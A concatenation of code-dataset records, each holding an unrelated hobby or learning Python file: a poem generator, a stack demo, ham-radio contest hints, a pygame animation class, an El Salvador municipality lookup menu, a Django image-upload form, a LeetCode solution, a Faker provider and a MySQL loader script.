choice(nouns)\r\n while n1 == n2:\r\n n2 = choice(nouns)\r\n while n2 == n3 or n1 == n3:\r\n n3 = choice(nouns)\r\n\r\n # pull up 3 verbs\r\n v1 = choice(verbs)\r\n v2 = choice(verbs)\r\n v3 = choice(verbs)\r\n while v1 == v2:\r\n v2 = choice(verbs)\r\n while v2 == v3 or v3 == v1:\r\n v3 = choice(verbs)\r\n\r\n # pull up 3 adjectives\r\n a1 = choice(adjectives)\r\n a2 = choice(adjectives)\r\n a3 = choice(adjectives)\r\n while a1 == a2:\r\n a2 = choice(adjectives)\r\n while a2 == a3 or a3 == a1:\r\n a3 = choice(adjectives)\r\n\r\n # pull up 2 prepositions\r\n p1 = choice(prepositions)\r\n p2 = choice(prepositions)\r\n while p1 == p2:\r\n p2 = choice(prepositions)\r\n\r\n # pull up 1 adverb\r\n av1 = choice(adverbs)\r\n\r\n if \"aeiouy\".find(a1) != -1:\r\n a = \"A\"\r\n else:\r\n a = \"An\"\r\n\r\n poem = f\"\"\"{a} {a1} {n1} \\n{a} {a1} {n1} {v1} {p1} the {a2} {n2} \\n{av1}, the {n1} {v2} \\nthe {n2} {v3} {p2} a {a3}\r\n {n3}\"\"\"\r\n return poem\r\n\r\npoetic = print(makepoem())\r\n","repo_name":"Zawadidone/learning-python","sub_path":"RealPython/RealPythonPart1/poetry.py","file_name":"poetry.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32772616190","text":"class Stack: \n def __init__(self): \n self.elements = [] \n \n def push(self, data): \n self.elements.append(data) \n return data \n \n def pop(self): \n if len(self.elements) > 0:\n return self.elements.pop() \n \n def peek(self): \n if len(self.elements) > 0:\n return self.elements[-1] \n \n def is_empty(self): \n return len(self.elements) == 0\n\nif __name__ == '__main__':\n stack = Stack()\n \n ## checking is_empty method -> true\n print(stack.is_empty())\n\n ## pushing the elements\n stack.push(1)\n stack.push(2)\n stack.push(3)\n stack.push(4)\n stack.push(5)\n\n ## again checking is_empty method -> false\n print(stack.is_empty())\n\n ## printing the topmost element of the stack -> 5\n print(stack.peek())\n\n ## popping the topmost element -> 5\n stack.pop()\n\n ## checking the topmost element using peek method -> 4\n print(stack.peek())\n\n ## popping all the elements\n stack.pop()\n stack.pop() \n stack.pop() \n stack.pop() \n\n ## checking the is_empty method for the last time -> true\n print(stack.is_empty())\n","repo_name":"karthik2265/Data-structures-and-Algorithms-Python","sub_path":"Data-Structures/stack/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"75"} +{"seq_id":"36999881321","text":"from rig_io.ft_tables import CA_COUNTIES \n\n############################################################################################\n\n# Routine to sift through previous contest lists to get a hint of exhcange\n# info (qth, member no. etc.)\ndef master(P,call,dx_station=None,VERBOSITY=0):\n\n if VERBOSITY>0:\n print('HINT-MASTER: call=',call,len(P.calls))\n \n # Check for DX calls\n if (call not in P.calls) and dx_station and ('/' in call):\n call=dx_station.homecall\n \n if call in P.calls:\n if VERBOSITY>0:\n print('MASTER:',call,' is in master list')\n if P.KEYING:\n h=P.KEYING.hint(call)\n try:\n print(call,'\\tmaster=',P.MASTER[call],'\\nhint=',h)\n except:\n print('HINT MASTER - I dont know what I am doing here',call)\n return h\n else:\n print('HINT.MASTER: No hints available for this contest')\n return None\n\n else:\n if VERBOSITY>0:\n print('HINT.MASTER:',call,' is NOT in master list')\n if dx_station:\n if P.contest_name=='CQWW':\n return dx_station.cqz\n return None\n\n\n# Routine to give a hint of QTH of a CA station\ndef commie_fornia(dx_station,qth):\n if dx_station.country=='United States' and dx_station.cqz==3:\n if VERBOSITY>0:\n print('Commie-fornia')\n #print CA_COUNTIES\n #hints= [s for s in CA_COUNTIES if qth in s]\n hints=[]\n n=len(qth)\n for s in CA_COUNTIES:\n if qth==s[0:n]:\n hints.append(s)\n return ' '.join(hints)\n else:\n return None\n \n# Routine to give a hint of QTH of a Canadian station\ndef oh_canada(dx_station):\n\n \"\"\" Prefixes\tProvince/Territory\n VE1 VA1\tNova Scotia\n VE2 VA2\tQuebec\t\n VE3 VA3\tOntario\t\n VE4 VA4\tManitoba\t\n VE5 VA5\tSaskatchewan\t\n VE6 VA6\tAlberta\t\n VE7 VA7\tBritish Columbia\t\n VE8\tNorthwest Territories\t\n VE9\tNew Brunswick\t\n VE0*\tInternational Waters\n VO1\tNewfoundland\n VO2\tLabrador\n VY1\tYukon\t\n VY2\tPrince Edward Island\n VY9**\tGovernment of Canada\n VY0\tNunavut\t\n CY0***\tSable Is.[16]\t\n CY9***\tSt-Paul Is.[16]\t\n\n For the CQP:\n MR Maritimes\n QC Quebec\n ON Ontario\n MB Manitoba\n SK Saskatchewan\n AB Alberta\n BC British Columbia\n NT \"\"\"\n\n # For Cali QSO Party:\n # MR = Maritime provinces plus Newfoundland and Labrador (NB, NL, NS, PE)\n CQP_VE_CALL_AREAS = ['??','MR','QC','ON','MB','SK','AB','BC','NT']\n\n if dx_station.country=='Canada':\n #if (dx_station.prefix=='VO2' or dx_station.prefix=='VY2'):\n if dx_station.prefix in ['VO2','VY2','VE9']:\n qth='MR'\n else:\n num=int( dx_station.call_number )\n if num>=0 and num \"FrameAnimation\":\n \"\"\"\n Load from a spritesheet.\n\n Args:\n filename: name of the spritesheet file\n image_size: size (in pixels) of the frames in the spritesheet\n colorkey: used by pygame.Surface.set_colorkey\n num_images: can be used to limit the number of images loaded\n scale: see __init__\n flip_x: see __init__\n flip_y: see __init__\n colormap: see __init__\n\n Returns:\n a new instance\n \"\"\"\n images = loading.load_spritesheet(\n filename=filename, image_size=image_size, colorkey=colorkey, num_images=num_images\n )\n return cls(images=images, scale=scale, flip_x=flip_x, flip_y=flip_y, colormap=colormap)\n\n @classmethod\n def from_images(\n cls,\n pattern: Path | str,\n colorkey=None,\n num_images: int = 0,\n scale: float = None,\n flip_x: bool = False,\n flip_y: bool = False,\n colormap: dict = None,\n ) -> \"FrameAnimation\":\n \"\"\"\n Load from a sequence of images in a folder.\n\n Args:\n pattern: glob pattern used by `load_image_sequence`\n colorkey: used by pygame.Surface.set_colorkey\n num_images: can be used to limit the number of images loaded\n scale: see __init__\n flip_x: see __init__\n flip_y: see __init__\n colormap: see __init__\n\n Returns:\n a new instance\n \"\"\"\n images = loading.load_image_sequence(\n pattern=pattern, colorkey=colorkey, num_images=num_images\n )\n return cls(images=images, scale=scale, flip_x=flip_x, flip_y=flip_y, colormap=colormap)\n\n # =================== playback ===================\n\n def play(self, n: int, repeat_frame: int = -1) -> Surface:\n \"\"\"\n Play the animation once and then continue returning the specified frame\n (default=last frame).\n\n Args:\n n: the current frame (use game tick or some other timer variable)\n repeat_frame: the frame to repeat after the animation has finished (default = last\n frame)\n\n Returns:\n the image to display\n \"\"\"\n try:\n return self[n]\n except IndexError:\n return self[repeat_frame]\n\n def loop(self, n: int) -> Surface:\n \"\"\"\n Like `play()` but if `n` is greater than the number of frames, start again at the beginning.\n\n Args:\n n: the current frame (use game tick or some other timer variable)\n\n Returns:\n the image to display\n \"\"\"\n return self.play(n % len(self))\n\n # =================== image manipulation ===================\n\n def flip(self, x=False, y=False) -> \"FrameAnimation\":\n \"\"\"\n Flip images and return a new instance.\n\n Args:\n x: flip horizontally\n y: flip vertically\n\n Returns:\n a new instance\n \"\"\"\n return self.__class__(images=self, flip_x=x, flip_y=y)\n\n def flip_in_place(self, x: bool, y: bool):\n \"\"\"\n Flip images in place.\n\n Args:\n x: flip horizontally\n y: flip vertically\n \"\"\"\n for index, image in enumerate(self):\n self[index] = manipulation.flip_image(image, flip_x=x, flip_y=y)\n\n def recolor(self, colormap: dict) -> \"FrameAnimation\":\n \"\"\"\n Like `recolor()` but returns a new instance.\n\n Args:\n colormap: mapping of old colours to new colours\n\n Returns:\n a new instance\n \"\"\"\n return self.__class__(images=self, colormap=colormap)\n\n def recolor_in_place(self, colormap: dict):\n \"\"\"\n Recolor in place.\n\n Args:\n colormap: mapping of old colours to new colours\n \"\"\"\n for index, image in enumerate(self):\n self[index] = manipulation.recolor_image(image, colormap)\n\n def scale(self, scale: float) -> \"FrameAnimation\":\n \"\"\"\n Scale images and return a new instance.\n\n Args:\n scale: factor by which to scale images\n\n Returns:\n a new instance\n \"\"\"\n return self.__class__(images=self, scale=scale)\n\n def scale_in_place(self, scale: float):\n \"\"\"\n Scale in place.\n\n Args:\n scale: factor by which to scale images\n \"\"\"\n for index, image in enumerate(self):\n self[index] = manipulation.scale_image(image, scale)\n","repo_name":"binnev/robingame","sub_path":"robingame/image/frame_animation.py","file_name":"frame_animation.py","file_ext":"py","file_size_in_byte":6169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2053878744","text":"\r\nprint(\"\\t\\t*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~\")\r\nprint(\"\\t\\t*~ Bienvenido/a al programa *~\")\r\nprint(\"\\t\\t*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~\\n\")\r\nprint(\"Indicaciones:\\nEn este programa debera seleccionar un departamento perteneciente a El Salvador y\\nobtendra los distintos municipios pertenecientes a ese departamento\\n\")\r\n\r\n#Conjuntos de Departamentos y Municipios\r\nDepartamentos = [\"Ahuachapán\",\"Cabañas\",\"Chalatenango\",\"Cuscatlán\",\"Morazán\",\"La Libertad\",\"La Paz\",\"La Unión\",\"San Miguel\",\"San Salvador\",\"San Vicente\",\"Santa Ana\",\"Sonsonate\",\"Usulután\"]\r\nMunicipios =[[\"Apaneca\",\"Atiquizaya\",\"Concepción de Ataco\",\"El Refugio\",\"Guaymango\",\"Jujutla\",\"San Francisco Menéndez\",\"San Lorenzo\",\"San Pedro Puxtla\",\"Tacuba\",\"Turín\"],\r\n [\"Cinquera\",\"Dolores / Villa Dolores\",\"Guacotecti\",\"Ilobasco\",\"Jutiapa\",\"San Isidro\",\"Sensuntepeque\",\"Tejutepeque\",\"Victoria\"],\r\n [\"Agua Caliente\",\"Arcatao\",\"Azacualpa\",\"Chalatenango\",\"Citalá\",\"Comalapa\",\"Concepción Quezaltepeque\",\"Dulce Nombre de María\",\"El Carrizal\",\"El Paraíso\",\"La Laguna\",\"La Palma\",\"La Reina\",\"Las Vueltas\",\"Nombre de Jesús\",\"Nueva Concepción\",\"Nueva Trinidad\",\"Ojos de Agua\",\"Potonico\",\"San Antonio de la Cruz\",\"San Antonio Los Ranchos\",\"San Fernando\",\"San Francisco Lempa\",\"San Francisco Morazán\",\"San Ignacio\",\"San Isidro Labrador\",\"San José Cancasque / Cancasque\",\"San José Las Flores / Las Flores\",\"San Luis del Carmen\",\"San Miguel de Mercedes\",\"San Rafael\",\"Santa Rita\",\"Tejutla\"],\r\n [\"Candelaria\",\"Cojutepeque\",\"El Carmen\",\"El Rosario\",\"Monte San Juan\",\"Oratorio de Concepción\",\"San Bartolomé Perulapía\",\"San Cristóbal\",\"San José Guayabal\",\"San Pedro Perulapán\",\"San Rafael Cedros\",\"San Ramón\",\"Santa Cruz Analquito\",\"Santa Cruz Michapa\",\"Suchitoto\",\"Tenancingo\"],\r\n [\"Arambala\",\"Cacaopera\",\"Chilanga\",\"Corinto\",\"Delicias de Concepción\",\"El Divisadero\",\"El Rosario\",\"Gualococti\",\"Guatajiagua\",\"Joateca\",\"Jocoaitique\",\"Jocoro\",\"Lolotiquillo\",\"Meanguera\",\"Osicala\",\"Perquín\",\"San Carlos\",\"San Fernando\",\"San Francisco Gotera\",\"San Isidro\",\"San Simón\",\"Sensembra\",\"Sociedad\",\"Torola\",\"Yamabal\",\"Yoloaiquín\"],\r\n [\"Antiguo Cuscatlán\",\"Chiltiupán\",\"Ciudad Arce\",\"Colón\",\"Comasagua\",\"Huizúcar\",\"Jayaque\",\"Jicalapa\",\"La Libertad\",\"Santa Tecla\",\"Nuevo Cuscatlán\",\"San Juan Opico\",\"Quezaltepeque\",\"Sacacoyo\",\"San José Villanueva\",\"San Matías\",\"San Pablo Tacachico\",\"Talnique\",\"Tamanique\",\"Teotepeque\",\"Tepecoyo\",\"Zaragoza\"],\r\n [\"Cuyultitán\",\"El Rosario / Rosario de La Paz\",\"Jerusalén\",\"Mercedes La Ceiba\",\"Olocuilta\",\"Paraíso de Osorio\",\"San Antonio Masahuat\",\"San Emigdio\",\"San Francisco Chinameca\",\"San Juan Nonualco\",\"San Juan Talpa\",\"San Juan Tepezontes\",\"San Luis La Herradura\",\"San Luis Talpa\",\"San Miguel Tepezontes\",\"San Pedro Masahuat\",\"San Pedro Nonualco\",\"San Rafael Obrajuelo\",\"Santa María Ostuma\",\"Santiago Nonualco\",\"Tapalhuaca\",\"Zacatecoluca\"],\r\n [\"Anamorós\",\"Bolívar\",\"Concepción de Oriente\",\"Conchagua\",\"El Carmen\",\"El Sauce\",\"Intipucá\",\"La Unión\",\"Lilisque\",\"Meanguera del Golfo\",\"Nueva Esparta\",\"Pasaquina\",\"Polorós\",\"San Alejo\",\"San José\",\"Santa Rosa de Lima\",\"Yayantique\",\"Yucuaiquín\"],\r\n [\"Carolina\",\"Chapeltique\",\"Chinameca\",\"Chirilagua\",\"Ciudad Barrios\",\"Comacarán\",\"El Tránsito\",\"Lolotique\",\"Moncagua\",\"Nueva Guadalupe\",\"Nuevo Edén de San Juan\",\"Quelepa\",\"San Antonio del Mosco\",\"San Gerardo\",\"San Jorge\",\"San Luis de la Reina\",\"San Miguel\",\"San Rafael Oriente\",\"Sesori\",\"Uluazapa\"],\r\n [\"Aguilares\",\"Apopa\",\"Ayutuxtepeque\",\"Delgado\",\"Cuscatancingo\",\"El Paisnal\",\"Guazapa\",\"Ilopango\",\"Mejicanos\",\"Nejapa\",\"Panchimalco\",\"Rosario de Mora\",\"San Marcos\",\"San Martín\",\"San Salvador\",\"Santiago Texacuangos\",\"Santo Tomás\",\"Soyapango\",\"Tonacatepeque\"],\r\n [\"Apastepeque\",\"Guadalupe\",\"San Cayetano Istepeque\",\"San Esteban Catarina\",\"San Ildefonso\",\"San Lorenzo\",\"San Sebastián\",\"San Vicente\",\"Santa Clara\",\"Santo Domingo\",\"Tecoluca\",\"Tepetitán\",\"Verapaz\"],\r\n [\"Candelaria de la Frontera\",\"Chalchuapa\",\"Coatepeque\",\"El Congo\",\"El Porvenir\",\"Masahuat\",\"Metapán\",\"San Antonio Pajonal\",\"San Sebastián Salitrillo\",\"Santa Ana\",\"Santa Rosa Guachipilín\",\"Santiago de la Frontera\",\"Texistepeque\"],\r\n [\"Acajutla\",\"Armenia\",\"Caluco\",\"Cuisnahuat\",\"Izalco\",\"Juayúa\",\"Nahuizalco\",\"Nahulingo\",\"Salcoatitán\",\"San Antonio del Monte\",\"San Julián\",\"Santa Catarina Masahuat\",\"Santa Isabel Ishuatán\",\"Santo Domingo de Guzmán\",\"Sonsonate\",\"Sonzacate\"],\r\n [\"Alegría\",\"Berlín\",\"California\",\"Concepción Batres\",\"El Triunfo\",\"Ereguayquín\",\"Estanzuelas\",\"Jiquilisco\",\"Jucuapa\",\"Jucuarán\",\"Mercedes Umaña\",\"Nueva Granada\",\"Ozatlán\",\"Puerto El Triunfo\",\"San Agustín\",\"San Buenaventura\",\"San Dionisio\",\"San Francisco Javier\",\"Santa Elena\",\"Santa María\",\"Santiago de María\",\"Tecapán\",\"Usulután\"]]\r\n\r\n#Funcion StartProgram\r\ndef StartProgram():\r\n Start = True\r\n Reinicio = False\r\n while Departamentos:\r\n z = 0\r\n\r\n #Reinicio de programa\r\n if Reinicio == True:\r\n Start = input(\"\\nDesea consultar otro departamento -> \").lower()\r\n if Start == \"si\".lower():\r\n Start = True\r\n\r\n elif Start == \"no\".lower():\r\n break\r\n\r\n else:\r\n print(\"\\n\\t~~~ Opción no válida ~~~\")\r\n\r\n #Programa\r\n while Start == True:\r\n while z < 4 and Start == True:\r\n print(\"\\n\\tDepartamentos de El Salvador:\")\r\n\r\n #Lista y selección de departamentos\r\n x = 0\r\n for i in range(len(Departamentos)):\r\n print(f\"\\t{x+1}- {Departamentos[x]}\")\r\n x += 1\r\n\r\n Select = input(\"\\nSelecione 1 departamento -> \").lower()\r\n\r\n #Resultados de la elección del departamento\r\n if Select == \"1\" or Select == Departamentos[0].lower() or Select == \"Ahuachapan\".lower():\r\n print(f\"\\n\\tDepartamento: {Departamentos[0]}\")\r\n print(\"\\n\\tMunicipios:\")\r\n y = 0\r\n for i in range(len(Municipios[0])):\r\n print(f\"\\t{y + 1}- {Municipios[0][y]}\")\r\n y += 1\r\n Reinicio = True\r\n Start = False\r\n\r\n elif Select == \"2\"or Select == Departamentos[1].lower():\r\n print(f\"\\n\\tDepartamento: {Departamentos[1]}\")\r\n print(\"\\n\\tMunicipios:\")\r\n y = 0\r\n for i in range(len(Municipios[1])):\r\n print(f\"\\t{y + 1}- {Municipios[1][y]}\")\r\n y += 1\r\n Reinicio = True\r\n Start = False\r\n\r\n elif Select == \"3\"or Select == Departamentos[2].lower():\r\n print(f\"\\n\\tDepartamento: {Departamentos[2]}\")\r\n print(\"\\n\\tMunicipios:\")\r\n y = 0\r\n for i in range(len(Municipios[2])):\r\n print(f\"\\t{y + 1}- {Municipios[2][y]}\")\r\n y += 1\r\n Reinicio = True\r\n Start = False\r\n\r\n elif Select == \"4\"or Select == Departamentos[3].lower() or Select == \"Cuscatlan\".lower():\r\n print(f\"\\n\\tDepartamento: {Departamentos[3]}\")\r\n print(\"\\n\\tMunicipios:\")\r\n y = 0\r\n for i in range(len(Municipios[3])):\r\n print(f\"\\t{y + 1}- {Municipios[3][y]}\")\r\n y += 1\r\n Reinicio = True\r\n Start = False\r\n\r\n elif Select == \"5\"or Select == Departamentos[4].lower() or Select == \"Morazan\".lower():\r\n print(f\"\\n\\tDepartamento: {Departamentos[4]}\")\r\n print(\"\\n\\tMunicipios:\")\r\n y = 0\r\n for i in range(len(Municipios[4])):\r\n print(f\"\\t{y + 1}- {Municipios[4][y]}\")\r\n y += 1\r\n Reinicio = True\r\n Start = False\r\n\r\n elif Select == \"6\"or Select == Departamentos[5].lower() or Select == \"Libertad\".lower():\r\n print(f\"\\n\\tDepartamento: {Departamentos[5]}\")\r\n print(\"\\n\\tMunicipios:\")\r\n y = 0\r\n for i in range(len(Municipios[5])):\r\n print(f\"\\t{y + 1}- {Municipios[5][y]}\")\r\n y += 1\r\n Reinicio = True\r\n Start = False\r\n\r\n elif Select == \"7\"or Select == Departamentos[6].lower():\r\n print(f\"\\n\\tDepartamento: {Departamentos[6]}\")\r\n print(\"\\n\\tMunicipios:\")\r\n y = 0\r\n for i in range(len(Municipios[6])):\r\n print(f\"\\t{y + 1}- {Municipios[6][y]}\")\r\n y += 1\r\n Reinicio = True\r\n Start = False\r\n\r\n elif Select == \"8\"or Select == Departamentos[7].lower() or Select == \"La Union\".lower() or Select == \"Union\".lower() or Select == \"Unión\".lower():\r\n print(f\"\\n\\tDepartamento: {Departamentos[7]}\")\r\n print(\"\\n\\tMunicipios:\")\r\n y = 0\r\n for i in range(len(Municipios[7])):\r\n print(f\"\\t{y + 1}- {Municipios[7][y]}\")\r\n y += 1\r\n Reinicio = True\r\n Start = False\r\n\r\n elif Select == \"9\"or Select == Departamentos[8].lower():\r\n print(f\"\\n\\tDepartamento: {Departamentos[8]}\")\r\n print(\"\\n\\tMunicipios:\")\r\n y = 0\r\n for i in range(len(Municipios[8])):\r\n print(f\"\\t{y + 1}- {Municipios[8][y]}\")\r\n y += 1\r\n Reinicio = True\r\n Start = False\r\n\r\n elif Select == \"10\" or Select == Departamentos[9].lower():\r\n print(f\"\\n\\tDepartamento: {Departamentos[9]}\")\r\n print(\"\\n\\tMunicipios:\")\r\n y = 0\r\n for i in range(len(Municipios[9])):\r\n print(f\"\\t{y + 1}- {Municipios[9][y]}\")\r\n y += 1\r\n Reinicio = True\r\n Start = False\r\n\r\n elif Select == \"11\" or Select == Departamentos[10].lower():\r\n print(f\"\\n\\tDepartamento: {Departamentos[10]}\")\r\n print(\"\\n\\tMunicipios:\")\r\n y = 0\r\n for i in range(len(Municipios[10])):\r\n print(f\"\\t{y + 1}- {Municipios[10][y]}\")\r\n y += 1\r\n Reinicio = True\r\n Start = False\r\n\r\n elif Select == \"12\" or Select == Departamentos[11].lower():\r\n print(f\"\\n\\tDepartamento: {Departamentos[11]}\")\r\n print(\"\\n\\tMunicipios:\")\r\n y = 0\r\n for i in range(len(Municipios[11])):\r\n print(f\"\\t{y + 1}- {Municipios[11][y]}\")\r\n y += 1\r\n Reinicio = True\r\n Start = False\r\n\r\n elif Select == \"13\" or Select == Departamentos[12].lower():\r\n print(f\"\\n\\tDepartamento: {Departamentos[12]}\")\r\n print(\"\\n\\tMunicipios:\")\r\n y = 0\r\n for i in range(len(Municipios[12])):\r\n print(f\"\\t{y + 1}- {Municipios[12][y]}\")\r\n y += 1\r\n Reinicio = True\r\n Start = False\r\n\r\n elif Select == \"14\" or Select == Departamentos[13].lower() or Select == \"Usulutan\".lower():\r\n print(f\"\\n\\tDepartamento: {Departamentos[13]}\")\r\n print(\"\\n\\tMunicipios:\")\r\n y = 0\r\n for i in range(len(Municipios[13])):\r\n print(f\"\\t{y + 1}- {Municipios[13][y]}\")\r\n y += 1\r\n Reinicio = True\r\n Start = False\r\n\r\n #Contador de intentos fallidos\r\n else:\r\n z += 1\r\n if z == 4:\r\n print(\"\\n\\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\") \r\n print(\"\\t~~ Demasados intentos fallidos ~~\")\r\n print(\"\\t~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n\")\r\n Reinicio = True\r\n Start = False\r\n\r\n else:\r\n print(\"\\n\\t~~~ Opción no válida ~~~\")\r\n\r\n#Inicio o fin del programa\r\nwhile Departamentos:\r\n Start = input(\"Desea iniciar el programa -> \").lower()\r\n if Start == \"si\".lower():\r\n StartProgram()\r\n break\r\n\r\n elif Start == \"no\".lower():\r\n break\r\n\r\n else:\r\n print(\"~~~ Opción no válida ~~~\")\r\n\r\nprint(\"\\nFin del programa\")","repo_name":"Ivaname99/ActividadAsincrona-Semana14","sub_path":"ActividadAsincrona - Semana 14(Grupo#5).py","file_name":"ActividadAsincrona - Semana 14(Grupo#5).py","file_ext":"py","file_size_in_byte":13209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27700435580","text":"from django import forms\nfrom django.conf import settings\nfrom django.core.exceptions import ValidationError\n\nfrom tower import ugettext_lazy as _lazy\n\n\nMSG_IMAGE_REQUIRED = _lazy(u'You have not selected an image to upload.')\nMSG_IMAGE_LONG = _lazy(\n u'Please keep the length of your image filename to %(max)s '\n u'characters or less. It is currently %(length)s characters.')\nMSG_IMAGE_EXTENSION = _lazy(u'Please upload an image with one of the '\n u'following extensions: jpg, jpeg, png, gif.')\nALLOWED_IMAGE_EXTENSIONS = ('jpg', 'jpeg', 'png', 'gif')\n\n\nclass ImageAttachmentUploadForm(forms.Form):\n \"\"\"Image upload form.\"\"\"\n image = forms.ImageField(error_messages={'required': MSG_IMAGE_REQUIRED,\n 'max_length': MSG_IMAGE_LONG},\n max_length=settings.MAX_FILENAME_LENGTH)\n\n def clean(self):\n c = super(ImageAttachmentUploadForm, self).clean()\n clean_image_extension(c.get('image'))\n return c\n\n\ndef clean_image_extension(form_field):\n \"\"\"Ensure only images of certain extensions can be uploaded.\"\"\"\n if form_field:\n if '.' not in form_field.name:\n raise ValidationError(MSG_IMAGE_EXTENSION)\n _, ext = form_field.name.rsplit('.', 1)\n if ext.lower() not in ALLOWED_IMAGE_EXTENSIONS:\n raise ValidationError(MSG_IMAGE_EXTENSION)\n","repo_name":"feer56/Kitsune1","sub_path":"kitsune/upload/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"18249959857","text":"# 775. Global and Local Inversions\n# Medium\n\n# 657\n\n# 221\n\n# Add to List\n\n# Share\n# We have some permutation A of [0, 1, ..., N - 1], where N is the length of A.\n\n# The number of (global) inversions is the number of i < j with 0 <= i < j < N and A[i] > A[j].\n\n# The number of local inversions is the number of i with 0 <= i < N and A[i] > A[i+1].\n\n# Return true if and only if the number of global inversions is equal to the number of local inversions.\n\n# Example 1:\n\n# Input: A = [1,0,2]\n# Output: true\n# Explanation: There is 1 global inversion, and 1 local inversion.\n# Example 2:\n\n# Input: A = [1,2,0]\n# Output: false\n# Explanation: There are 2 global inversions, and 1 local inversion.\n# Note:\n\n# A will be a permutation of [0, 1, ..., A.length - 1].\n# A will have length in range [1, 5000].\n# The time limit for this problem has been reduced.\n\n\nclass Solution:\n def isIdealPermutation(self, A):\n # def isIdealPermutation(self, A: List[int]) -> bool:\n for i in range(len(A)):\n if not -1 <= i - A[i] <= 1:\n return False\n return True\n\n# class Solution:\n# def isIdealPermutation(self, A):\n# # def isIdealPermutation(self, A: List[int]) -> bool:\n# return all([(i-1<=a<=i+1) for i,a in enumerate(A)])\n\n\nsolution = Solution()\n\nprint(solution.isIdealPermutation([1, 0, 2]))\nprint(solution.isIdealPermutation([1, 2, 0]))\nprint(solution.isIdealPermutation([1, 0, 3, 2, 5, 4]))\nprint(solution.isIdealPermutation([2, 1, 0]))\n","repo_name":"zduvall/algorithm-practice","sub_path":"2021-4-5-Global-And-Local-Inversion.py","file_name":"2021-4-5-Global-And-Local-Inversion.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"29409120966","text":"import random\nfrom faker import Faker\nfrom faker.providers import BaseProvider\nfrom a_novel_factory.corpora import Corpora\n\nfake = Faker()\ncorpora = Corpora()\n\n\nclass CustomSentenceProvider(BaseProvider):\n def custom_sentence(self, characters) -> str:\n # base texts\n text = fake.sentence()\n a = random.choice(corpora.activities)\n p = random.choice(corpora.places)\n o = random.choice(corpora.objects)\n an = 'an' if o[0].lower() in 'aeiou' else 'a'\n adj = random.choice(corpora.adjectives)\n\n random_value = random.random()\n\n if random_value < 0.5:\n return f'{text}'\n elif random_value < 0.8:\n # one-character sentences\n c = random.choice(characters)\n return random.choice([\n f'{c.name} said \"{text}\"',\n f'{c.first} thought \"{text}\"',\n f'Look at {c.first} go!',\n f'{c.name} wept.',\n f'{c.name} took a cab to {p}.',\n f\"{c.prefix} {c.last}'s shoes were too tight.\",\n f'{c.name} sang, \"{text}\"',\n f'{c.first} was {a}.',\n f'{c.first} asked, \"{text.rstrip(\".\")}?\"',\n f'{c.first} was looking for {an} {o}.',\n f'{c.first} felt {adj}.',\n ])\n else:\n # two-character sentences\n c1, c2 = random.sample(characters, k=2)\n return random.choice([\n f'{c1.first} greeted {c2.first}.',\n f'{c1.name} fell in love with {c2.name}.',\n f'{c1.name} eyed {c2.name}.',\n f'{c1.first} asked {c2.first} for the time.',\n f'\"{c1.prefix} {c1.last}, I presume,\" said {c2.name}.',\n f'{c1.first} and {c2.first} were {a}.',\n f'{c1.first} and {c2.first} moved to {p}.',\n f'{c1.first} handed {c2.first} {an} {o}.',\n f'{c1.first} thought {c2.first} was looking {adj}.',\n ])\n","repo_name":"bensteinberg/a-novel-factory","sub_path":"a_novel_factory/providers.py","file_name":"providers.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"23247546774","text":"from functools import wraps\nfrom time import time\nfrom datetime import datetime\n\nimport pymysql\nimport argparse\nimport json\nfrom json2xml import json2xml\nfrom json2xml.utils import readfromstring\n\nfrom config import local_host, user, password, db_name\n\n\ndef recreate_table_if_needed(cursor):\n \"\"\" Create tables \"\"\"\n\n cursor.execute(\"DROP TABLE IF EXISTS students\")\n cursor.execute(\"DROP TABLE IF EXISTS rooms\")\n\n create_table_rooms = \"\"\"CREATE TABLE `rooms`\n (room_id INT AUTO_INCREMENT PRIMARY KEY,\n name varchar(32));\"\"\"\n cursor.execute(create_table_rooms)\n\n create_table_students = \"\"\"CREATE TABLE `students`\n (student_id INT AUTO_INCREMENT PRIMARY KEY,\n birthday DATETIME, \n name varchar(32), \n sex varchar(32), \n room_id INT, \n FOREIGN KEY (room_id) REFERENCES rooms(room_id));\"\"\"\n cursor.execute(create_table_students)\n\n index_create_str = \"ALTER TABLE students ADD INDEX birthday (birthday)\"\n cursor.execute(index_create_str)\n\n\ndef get_rooms(name_of_file):\n with open(name_of_file, \"r\", encoding=\"utf8\") as read_file:\n rooms = json.load(read_file)\n\n return rooms\n\n\ndef load_rooms_into_table_from_file(file_rooms, cursor, connection):\n \"\"\" Insert values into 'rooms' table \"\"\"\n\n rooms = get_rooms(file_rooms)\n\n for room in rooms:\n query_string = f\"INSERT INTO rooms(name) VALUES ('{room['name']}')\"\n\n cursor.execute(query_string)\n connection.commit()\n\n return rooms\n\n\ndef get_students(name_of_file):\n with open(name_of_file, \"r\", encoding=\"utf8\") as read_file:\n students = json.load(read_file)\n\n return students\n\n\ndef load_students_into_table_from_file(file_students, cursor, connection):\n \"\"\" Insert values into 'students' table \"\"\"\n\n students = get_students(file_students)\n\n for student in students:\n birthday = datetime.strptime(student['birthday'], \"%Y-%m-%dT%H:%M:%S.%f\")\n query_string = f\"\"\"INSERT INTO students (birthday, name, sex, room_id) \n VALUES ('{birthday}', '{student['name']}', '{student['sex']}', {student['room'] + 1})\"\"\"\n\n cursor.execute(query_string)\n connection.commit()\n\n return students\n\n\ndef timing(f):\n @wraps(f)\n def wrap(*args, **kw):\n ts = time()\n result = f(*args, **kw)\n te = time()\n print(f'{(te - ts) * 1000.0} millisec')\n return result\n\n return 